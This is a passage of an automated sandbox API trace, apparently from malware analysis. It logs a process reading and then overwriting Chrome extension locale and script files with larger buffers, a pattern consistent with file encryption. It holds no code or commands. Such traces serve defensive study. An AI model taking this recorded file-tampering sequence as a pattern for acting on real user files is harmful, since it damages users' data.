lpNumberOfBytesRead=0x2b1f2bc*=0xd5, lpOverlapped=0x0) returned 1 [0141.288] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0141.288] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x65d, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x65d, lpOverlapped=0x0) returned 1 [0141.288] CloseHandle (hObject=0x1d8) returned 1 [0141.288] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0141.289] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.289] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xee [0141.289] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.289] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.289] ReleaseMutex (hMutex=0x168) returned 1 [0141.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0141.290] ReadFile (in: hFile=0x1d8, lpBuffer=0x2697108, nNumberOfBytesToRead=0xee, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697108*, lpNumberOfBytesRead=0x2b1f2bc*=0xee, lpOverlapped=0x0) returned 1 [0141.291] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0141.291] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x676, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x2b1f2d0*=0x676, lpOverlapped=0x0) returned 1 [0141.291] CloseHandle (hObject=0x1d8) returned 1 [0141.291] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0141.292] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.292] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xe5 [0141.292] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.292] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.292] ReleaseMutex (hMutex=0x168) returned 1 [0141.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0141.292] ReadFile (in: hFile=0x1d8, lpBuffer=0x2697108, nNumberOfBytesToRead=0xe5, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697108*, lpNumberOfBytesRead=0x2b1f2bc*=0xe5, lpOverlapped=0x0) returned 1 [0141.294] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0141.294] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x66d, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x2b1f2d0*=0x66d, lpOverlapped=0x0) returned 1 [0141.294] CloseHandle (hObject=0x1d8) returned 1 [0141.294] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0141.295] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.295] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xfe [0141.295] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.295] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.296] ReleaseMutex (hMutex=0x168) returned 1 [0141.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0141.296] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eeb1f8, nNumberOfBytesToRead=0xfe, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eeb1f8*, lpNumberOfBytesRead=0x2b1f2bc*=0xfe, lpOverlapped=0x0) returned 1 [0141.297] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0141.298] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x686, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x2b1f2d0*=0x686, lpOverlapped=0x0) returned 1 [0141.298] CloseHandle (hObject=0x1d8) returned 1 [0141.298] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0141.299] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.299] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xe3 [0141.299] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.299] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.299] ReleaseMutex (hMutex=0x168) returned 1 [0141.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0141.299] ReadFile (in: hFile=0x1d8, lpBuffer=0x26c5048, nNumberOfBytesToRead=0xe3, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c5048*, lpNumberOfBytesRead=0x2b1f2bc*=0xe3, lpOverlapped=0x0) returned 1 [0141.300] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0141.301] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x66b, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x2b1f2d0*=0x66b, lpOverlapped=0x0) returned 1 [0141.301] CloseHandle (hObject=0x1d8) returned 1 [0141.301] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0141.903] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.904] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x5b6c [0141.905] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.905] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.905] ReleaseMutex (hMutex=0x168) returned 1 [0141.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eventpage_bin_prod.js", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0141.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eventpage_bin_prod.js", cchWideChar=21, lpMultiByteStr=0x1f88ba4, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eventpage_bin_prod.js", lpUsedDefaultChar=0x0) returned 21 [0141.905] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0141.908] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x4b6c [0141.908] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0141.963] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x4b6c [0141.964] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0141.964] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0141.964] WriteFile (in: hFile=0x1dc, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0141.965] CloseHandle (hObject=0x1dc) returned 1 [0147.838] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0147.953] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0147.953] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x14b [0147.953] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0147.953] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0147.953] ReleaseMutex (hMutex=0x168) returned 1 [0147.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0147.953] ReadFile (in: hFile=0x1dc, lpBuffer=0x25e9498, nNumberOfBytesToRead=0x14b, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25e9498*, lpNumberOfBytesRead=0x2b1f2bc*=0x14b, lpOverlapped=0x0) returned 1 [0147.955] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0147.955] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x6d3, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x2b1f2d0*=0x6d3, lpOverlapped=0x0) returned 1 [0147.955] CloseHandle (hObject=0x1dc) returned 1 [0147.956] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0147.957] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0147.957] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xcc [0147.957] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0147.957] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0147.957] ReleaseMutex (hMutex=0x168) returned 1 [0147.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0147.958] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ed5e38, nNumberOfBytesToRead=0xcc, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed5e38*, lpNumberOfBytesRead=0x2b1f2bc*=0xcc, lpOverlapped=0x0) returned 1 [0147.959] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0147.959] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x654, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x654, lpOverlapped=0x0) returned 1 [0147.960] CloseHandle (hObject=0x1dc) returned 1 [0147.960] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0147.961] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0147.961] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xd2 [0147.961] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0147.961] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0147.961] ReleaseMutex (hMutex=0x168) returned 1 [0147.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0147.962] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ed5e38, nNumberOfBytesToRead=0xd2, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed5e38*, lpNumberOfBytesRead=0x2b1f2bc*=0xd2, lpOverlapped=0x0) returned 1 [0147.963] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0147.963] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x65a, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x65a, lpOverlapped=0x0) returned 1 [0147.963] CloseHandle (hObject=0x1dc) returned 1 [0147.963] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0147.965] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0147.965] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xb2 [0147.965] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0147.965] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0147.965] ReleaseMutex (hMutex=0x168) returned 1 [0147.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0147.965] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f35ad8, nNumberOfBytesToRead=0xb2, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f35ad8*, lpNumberOfBytesRead=0x2b1f2bc*=0xb2, lpOverlapped=0x0) returned 1 [0147.967] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0147.967] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x63a, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x63a, lpOverlapped=0x0) returned 1 [0147.968] CloseHandle (hObject=0x1dc) returned 1 [0147.968] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0147.969] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: 